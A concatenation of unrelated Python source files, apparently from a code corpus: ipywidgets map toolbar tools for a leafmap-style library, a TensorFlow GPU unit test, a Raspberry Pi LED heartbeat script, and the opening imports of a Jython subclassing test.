style=style,
)
checkbox = widgets.Checkbox(
description="Replace existing census data layer",
value=True,
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
# output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
wms,
layer,
checkbox,
# output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def wms_change(change):
layer.options = census_dict[change["new"]]["layers"]
layer.value = layer.options[0]
wms.observe(wms_change, "value")
def layer_change(change):
if change["new"] != "":
if checkbox.value:
m.layers = m.layers[:-1]
m.add_census_data(wms.value, layer.value)
# with output:
# w = WebMapService(census_dict[wms.value]["url"])
# output.clear_output()
# print(w[layer.value].abstract)
layer.observe(layer_change, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
def search_basemaps(m=None):
"""The widget for search XYZ tile services.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
import xyzservices.providers as xyz
from xyzservices import TileProvider
layers = m.layers
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="search",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Search Quick Map Services (QMS)",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
providers = widgets.Dropdown(
options=[],
value=None,
description="XYZ Tile:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
keyword = widgets.Text(
value="",
description="Search keyword:",
placeholder="OpenStreetMap",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
def search_callback(change):
providers.options = []
if keyword.value != "":
tiles = search_xyz_services(keyword=keyword.value)
if checkbox.value:
tiles = tiles + search_qms(keyword=keyword.value)
providers.options = tiles
keyword.on_submit(search_callback)
buttons = widgets.ToggleButtons(
value=None,
options=["Search", "Reset", "Close"],
tooltips=["Search", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
def providers_change(change):
# with output:
# print(change["new"])
if change["new"] != "":
provider = change["new"]
if provider is not None:
if provider.startswith("qms"):
with output:
output.clear_output()
print("Adding data. Please wait...")
name = provider[4:]
qms_provider = TileProvider.from_qms(name)
url = qms_provider.build_url()
attribution = qms_provider.attribution
m.layers = layers
m.add_tile_layer(url, name, attribution)
output.clear_output()
elif provider.startswith("xyz"):
name = provider[4:]
xyz_provider = xyz.flatten()[name]
url = xyz_provider.build_url()
attribution = xyz_provider.attribution
m.layers = layers
if xyz_provider.requires_token():
with output:
output.clear_output()
print(f"{provider} requires an API Key.")
m.add_tile_layer(url, name, attribution)
providers.observe(providers_change, "value")
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
keyword,
providers,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Search":
providers.options = []
if keyword.value != "":
tiles = search_xyz_services(keyword=keyword.value)
if checkbox.value:
tiles = tiles + search_qms(keyword=keyword.value)
providers.options = tiles
with output:
output.clear_output()
# print("Running ...")
elif change["new"] == "Reset":
keyword.value = ""
providers.options = []
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
def download_osm(m=None):
"""Widget for downloading OSM data.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Checkbox",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
dropdown = widgets.Dropdown(
options=["Option 1", "Option 2", "Option 3"],
value=None,
description="Dropdown:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
int_slider = widgets.IntSlider(
min=1,
max=100,
description="Int Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
int_slider_label = widgets.Label()
widgets.jslink((int_slider, "value"), (int_slider_label, "value"))
float_slider = widgets.FloatSlider(
min=1,
max=100,
description="Float Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
float_slider_label = widgets.Label()
widgets.jslink((float_slider, "value"), (float_slider_label, "value"))
color = widgets.ColorPicker(
concise=False,
description="Color:",
value="white",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
text = widgets.Text(
value="",
description="Textbox:",
placeholder="Placeholder",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
textarea = widgets.Textarea(
placeholder="Placeholder",
layout=widgets.Layout(width=widget_width),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
buttons.style.button_padding = "0px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
widgets.HBox([int_slider, int_slider_label]),
widgets.HBox([float_slider, float_slider_label]),
dropdown,
text,
color,
textarea,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Apply":
with output:
output.clear_output()
print("Running ...")
elif change["new"] == "Reset":
textarea.value = ""
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
def inspector_gui(m=None):
"""Generates a tool GUI template using ipywidgets.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
import pandas as pd
widget_width = "250px"
padding = "0px 5px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
if m is not None:
marker_cluster = ipyleaflet.MarkerCluster(name="Inspector Markers")
setattr(m, "pixel_values", [])
setattr(m, "marker_cluster", marker_cluster)
if not hasattr(m, "interact_mode"):
setattr(m, "interact_mode", False)
if not hasattr(m, "inspector_output"):
inspector_output = widgets.Output(
layout=widgets.Layout(width=widget_width, padding="0px 5px 5px 5px")
)
setattr(m, "inspector_output", inspector_output)
output = m.inspector_output
output.clear_output()
if not hasattr(m, "inspector_add_marker"):
inspector_add_marker = widgets.Checkbox(
description="Add Marker at clicked location",
value=True,
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
setattr(m, "inspector_add_marker", inspector_add_marker)
add_marker = m.inspector_add_marker
if not hasattr(m, "inspector_bands_chk"):
inspector_bands_chk = widgets.Checkbox(
description="Get pixel value for visible bands only",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
setattr(m, "inspector_bands_chk", inspector_bands_chk)
bands_chk = m.inspector_bands_chk
if not hasattr(m, "inspector_class_label"):
inspector_label = widgets.Text(
value="",
description="Class label:",
placeholder="Add a label to the marker",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
setattr(m, "inspector_class_label", inspector_label)
label = m.inspector_class_label
options = []
if hasattr(m, "cog_layer_dict"):
options = list(m.cog_layer_dict.keys())
if len(options) == 0:
default_option = None
else:
default_option = options[0]
if not hasattr(m, "inspector_dropdown"):
inspector_dropdown = widgets.Dropdown(
options=options,
value=default_option,
description="Select a layer:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
setattr(m, "inspector_dropdown", inspector_dropdown)
dropdown = m.inspector_dropdown
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Download", "Reset", "Close"],
tooltips=["Download", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
if len(options) == 0:
with output:
print("No COG/STAC layers available")
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
add_marker,
label,
dropdown,
bands_chk,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def chk_change(change):
if hasattr(m, "pixel_values"):
m.pixel_values = []
if hasattr(m, "marker_cluster"):
m.marker_cluster.markers = []
output.clear_output()
bands_chk.observe(chk_change, "value")
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
if hasattr(m, "inspector_mode"):
delattr(m, "inspector_mode")
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
m.default_style = {"cursor": "default"}
m.marker_cluster.markers = []
m.pixel_values = []
marker_cluster_layer = m.find_layer("Inspector Markers")
if marker_cluster_layer is not None:
m.remove_layer(marker_cluster_layer)
if hasattr(m, "pixel_values"):
delattr(m, "pixel_values")
if hasattr(m, "marker_cluster"):
delattr(m, "marker_cluster")
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Download":
with output:
output.clear_output()
if len(m.pixel_values) == 0:
print(
"No pixel values available. Click on the map to start collection data."
)
else:
print("Downloading pixel values...")
df = pd.DataFrame(m.pixel_values)
temp_csv = temp_file_path("csv")
df.to_csv(temp_csv, index=False)
link = create_download_link(temp_csv)
with output:
output.clear_output()
display(link)
elif change["new"] == "Reset":
label.value = ""
output.clear_output()
if hasattr(m, "pixel_values"):
m.pixel_values = []
if hasattr(m, "marker_cluster"):
m.marker_cluster.markers = []
elif change["new"] == "Close":
if m is not None:
if hasattr(m, "inspector_mode"):
delattr(m, "inspector_mode")
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
m.default_style = {"cursor": "default"}
m.marker_cluster.markers = []
marker_cluster_layer = m.find_layer("Inspector Markers")
if marker_cluster_layer is not None:
m.remove_layer(marker_cluster_layer)
m.pixel_values = []
if hasattr(m, "pixel_values"):
delattr(m, "pixel_values")
if hasattr(m, "marker_cluster"):
delattr(m, "marker_cluster")
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
lat = round(latlon[0], 4)
lon = round(latlon[1], 4)
if (
kwargs.get("type") == "click"
and hasattr(m, "inspector_mode")
and m.inspector_mode
):
m.default_style = {"cursor": "wait"}
with output:
output.clear_output()
print("Getting pixel value ...")
layer_dict = m.cog_layer_dict[dropdown.value]
if layer_dict["type"] == "STAC":
if bands_chk.value:
assets = layer_dict["assets"]
else:
assets = None
result = stac_pixel_value(
lon,
lat,
layer_dict["url"],
layer_dict["collection"],
layer_dict["items"],
assets,
layer_dict["titiler_endpoint"],
verbose=False,
)
if result is not None:
with output:
output.clear_output()
print(f"lat/lon: {lat:.4f}, {lon:.4f}\n")
for key in result:
print(f"{key}: {result[key]}")
result["latitude"] = lat
result["longitude"] = lon
result["label"] = label.value
m.pixel_values.append(result)
if add_marker.value:
markers = list(m.marker_cluster.markers)
markers.append(ipyleaflet.Marker(location=latlon))
m.marker_cluster.markers = markers
else:
with output:
output.clear_output()
print("No pixel value available")
elif layer_dict["type"] == "COG":
result = cog_pixel_value(lon, lat, layer_dict["url"], verbose=False)
if result is not None:
with output:
output.clear_output()
print(f"lat/lon: {lat:.4f}, {lon:.4f}\n")
for key in result:
print(f"{key}: {result[key]}")
result["latitude"] = lat
result["longitude"] = lon
result["label"] = label.value
m.pixel_values.append(result)
if add_marker.value:
markers = list(m.marker_cluster.markers)
markers.append(ipyleaflet.Marker(location=latlon))
m.marker_cluster.markers = markers
else:
with output:
output.clear_output()
print("No pixel value available")
m.default_style = {"cursor": "crosshair"}
if m is not None:
if not hasattr(m, "marker_cluster"):
setattr(m, "marker_cluster", marker_cluster)
m.add_layer(marker_cluster)
if not m.interact_mode:
m.on_interaction(handle_interaction)
m.interact_mode = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
if not hasattr(m, "inspector_mode"):
if hasattr(m, "cog_layer_dict"):
setattr(m, "inspector_mode", True)
else:
setattr(m, "inspector_mode", False)
else:
return toolbar_widget
|
basic_gpu_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import _broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
def _compareGPU(self, x, y, np_func, tf_func):
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = sess.run(out)
with self.test_session(use_gpu=False) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_cpu = sess.run(out)
self.assertAllClose(tf_cpu, tf_gpu)
def testFloatBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
self._compareGPU(x, y, np.power, math_ops.pow)
def testFloatWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
class MathBuiltinUnaryTest(test.TestCase):
def _compare(self, x, np_func, tf_func, use_gpu):
np_out = np_func(x)
with self.test_session(use_gpu=use_gpu) as sess:
inx = ops.convert_to_tensor(x)
ofunc = tf_func(inx)
tf_out = sess.run(ofunc)
self.assertAllClose(np_out, tf_out)
def _inv(self, x):
return 1.0 / x
def _rsqrt(self, x):
return self._inv(np.sqrt(x))
def _testDtype(self, dtype, use_gpu):
data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
data_gt_1 = data + 2 # for x > 1
self._compare(data, np.abs, math_ops.abs, use_gpu)
self._compare(data, np.arccos, math_ops.acos, use_gpu)
self._compare(data, np.arcsin, math_ops.asin, use_gpu)
self._compare(data, np.arcsinh, math_ops.asinh, use_gpu)
self._compare(data_gt_1, np.arccosh, math_ops.acosh, use_gpu)
self._compare(data, np.arctan, math_ops.atan, use_gpu)
self._compare(data, np.ceil, math_ops.ceil, use_gpu)
self._compare(data, np.cos, math_ops.cos, use_gpu)
self._compare(data, np.cosh, math_ops.cosh, use_gpu)
self._compare(data, np.exp, math_ops.exp, use_gpu)
self._compare(data, np.floor, math_ops.floor, use_gpu)
self._compare(data, np.log, math_ops.log, use_gpu)
self._compare(data, np.log1p, math_ops.log1p, use_gpu)
self._compare(data, np.negative, math_ops.negative, use_gpu)
self._compare(data, self._rsqrt, math_ops.rsqrt, use_gpu)
self._compare(data, np.sin, math_ops.sin, use_gpu)
self._compare(data, np.sinh, math_ops.sinh, use_gpu)
self._compare(data, np.sqrt, math_ops.sqrt, use_gpu)
self._compare(data, np.square, math_ops.square, use_gpu)
self._compare(data, np.tan, math_ops.tan, use_gpu)
self._compare(data, np.tanh, math_ops.tanh, use_gpu)
self._compare(data, np.arctanh, math_ops.atanh, use_gpu)
def testTypes(self):
for dtype in [np.float32]:
self._testDtype(dtype, use_gpu=True)
def testFloorDivide(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
np_out = np.floor_divide(x, y + 0.1)
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y + 0.1)
ofunc = inx / iny
out_func2 = math_ops.floor(ofunc)
tf_out = sess.run(out_func2)
self.assertAllClose(np_out, tf_out)
class BroadcastSimpleTest(test.TestCase):
def _GetGradientArgs(self, xs, ys):
with self.test_session(use_gpu=True) as sess:
return sess.run(_broadcast_gradient_args(xs, ys))
def testBroadcast(self):
r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
self.assertAllEqual(r0, [])
self.assertAllEqual(r1, [0, 1, 2])
_GRAD_TOL = {dtypes.float32: 1e-3}
def _compareGradientX(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
xs = list(x.shape)
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, out, zs, x_init_value=x)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGradientY(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
ys = list(np.shape(y))
jacob_t, jacob_n = gradient_checker.compute_gradient(
iny, ys, out, zs, x_init_value=y)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGpu(self, x, y, np_func, tf_func):
np_ans = np_func(x, y)
with self.test_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = out.eval()
self.assertAllClose(np_ans, tf_gpu)
self.assertShapeEqual(np_ans, out)
# TODO (zhifengc/ke): make gradient checker work on GPU. id:2794 gh:2795
def testGradient(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
"""Tests concurrent sessions executing on the same GPU."""
def _run_session(self, session, results):
n_iterations = 500
with session as s:
data = variables.Variable(1.0)
with ops.device('/device:GPU:0'):
random_seed.set_random_seed(1)
matrix1 = variables.Variable(
random_ops.truncated_normal([1024, 1]), name='matrix1')
matrix2 = variables.Variable(
random_ops.truncated_normal([1, 1024]), name='matrix2')
x1 = math_ops.multiply(data, matrix1, name='x1')
x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
s.run(variables.global_variables_initializer())
for _ in xrange(n_iterations):
value = s.run(x4)
results.add(value.flat[0])
if len(results) != 1:
break
def testConcurrentSessions(self):
n_threads = 4
threads = []
results = []
for _ in xrange(n_threads):
session = self.test_session(graph=ops.Graph(), use_gpu=True)
results.append(set())
args = (session, results[-1])
threads.append(threading.Thread(target=self._run_session, args=args))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
flat_results = set([x for x in itertools.chain(*results)])
self.assertEqual(1,
len(flat_results),
'Expected single value, got %r' % flat_results)
if __name__ == '__main__':
test.main()
|
heart.py
|
"""
This class detects faces in frames it gets from the camera object passed to
the constructor.
The get_faces method returns the bounding boxes for all faces last detected.
A thread is created that does the heavy lifting of detecting faces and updates
a class var that contains the last faces detected. This allows the thread providing
the video feed to stream at 30fps while face frames lag behind at 3fps (maybe upto 10?)
"""
import sys
import time
import threading
from rpi_ws281x import PixelStrip
PINK = (168, 50, 105)
RED = (255, 0, 0)
BLUE = (0, 0, 128)
BLACK = (0, 0, 0)
BPM_NORMAL = 60
BPM_SLEEPING = 40
BPM_EXCITED = 110
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 12 # GPIO pin connected to the pixels (18 uses PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
# True to invert the signal (when using NPN transistor level shift)
LED_INVERT = False
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
class Heart:
thread = None
color = BLACK # background thread that reads frames from camera
next_color = PINK
bpm = 60
strip = None
def __init__(self):
if Heart.strip is None:
Heart.strip = PixelStrip(
LED_COUNT,
LED_PIN,
LED_FREQ_HZ,
LED_DMA,
LED_INVERT,
LED_BRIGHTNESS,
LED_CHANNEL
)
Heart.strip.begin()
if Heart.thread is None:
Heart.thread = threading.Thread(target=self._thread)
Heart.thread.start()
def pink(self):
Heart.next_color = PINK
return self
def red(self):
Heart.next_color = RED
return self
def blue(self):
Heart.next_color = BLUE
return self
def normal(self):
Heart.bpm = BPM_NORMAL
return self
def sleeping(self):
Heart.bpm = BPM_SLEEPING
return self
def excited(self):
Heart.bmp = BPM_EXCITED
return self
@classmethod
def _thread(cls):
cls.started_at = time.time()
while True:
bps = cls.bpm / 60
if cls.next_color != cls.color:
cls.fadeTo(cls.next_color, 40, 1)
cls.color = cls.next_color
# simulate heartbeat
cls.fill(cls.color) # red
time.sleep(.25 / bps)
cls.fill(BLACK)
time.sleep(.1 / bps)
cls.fill(cls.color)
cls.fadeTo(BLACK, 20, .6 / bps)
@classmethod
def fill(cls, rgb):
(r, g, b) = rgb
for i in range(cls.strip.numPixels()):
cls.strip.setPixelColorRGB(i, r, g, b, 255)
cls.strip.show()
# fade from current color to rgb
@ classmethod
def fadeTo(cls, rgb, steps, duration):
(r1, g1, b1) = cls.color
(r2, g2, b2) = rgb
r_inc = (r1 - r2) / steps
g_inc = (g1 - g2) / steps
b_inc = (b1 - b2) / steps
r = r1
g = g1
b = b1
for i in range(steps):
r -= r_inc
g -= g_inc
b -= b_inc
cls.fill((int(r), int(g), int(b)))
time.sleep(duration / steps)
if __name__ == '__main__':
heart = Heart()
while 1:
time.sleep(1)
|
test_java_subclasses.py
|
'''Tests subclassing Java classes in Python'''
import os
import sys
import threading
import unittest
from test import test_support
from java.lang import (Boolean, Class, ClassLoader, Comparable,Integer, Object, Runnable, String,
Thread, ThreadGroup, InterruptedException, UnsupportedOperationException)
from java.util import AbstractList, ArrayList, Date, Hashtable, HashSet, Vector
from java.util.concurrent import Callable, Executors
